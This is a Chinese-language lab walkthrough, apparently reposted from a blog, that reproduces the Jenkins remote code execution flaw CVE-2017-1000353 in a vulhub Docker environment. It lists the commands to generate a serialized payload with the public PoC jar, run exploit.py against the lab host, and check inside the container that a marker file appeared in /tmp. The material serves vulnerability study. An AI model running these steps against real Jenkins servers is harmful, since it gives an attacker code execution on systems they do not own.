首页 > 其他 > 详细

Jenkins-CI 远程代码执行漏洞复现(CVE-2017-1000353)

时间:2020-07-25 22:55:49      阅读:300      评论:0      收藏:0      [点我收藏+]

0x01 环境

使用vulhub搭建漏洞环境

/vulhub-master/jenkins/CVE-2017-1000353

http://192.168.255.130:8080/

技术分享图片

0x02 复现

首先下载CVE-2017-1000353-1.1-SNAPSHOT-all.jar,这是生成POC的工具。

https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar

执行下面命令,生成字节码文件:

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/CVE-2017-1000353_is_success"

执行上述代码后,在当前目录下生成jenkins_poc.ser文件,这就是序列化字符串。

技术分享图片

 

 接着下载exploit.py,https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py

【注意】上面链接里的exploit代码需要将Proxies里面的内容注释掉,否则会报错

技术分享图片

 

 执行exp

python exploit.py http://192.168.255.130:8080 jenkins_poc.ser

技术分享图片

 0x03 检验

首先查看环境的CONTAINER ID

sudo docker ps

技术分享图片

 接着进入容器内部

sudo docker exec -it 容器id bash

技术分享图片

 查看/tmp目录

技术分享图片

 验证成功

参考文章:https://blog.csdn.net/JiangBuLiu/article/details/95475293

Jenkins-CI 远程代码执行漏洞复现(CVE-2017-1000353)

原文:https://www.cnblogs.com/rnss/p/13377826.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!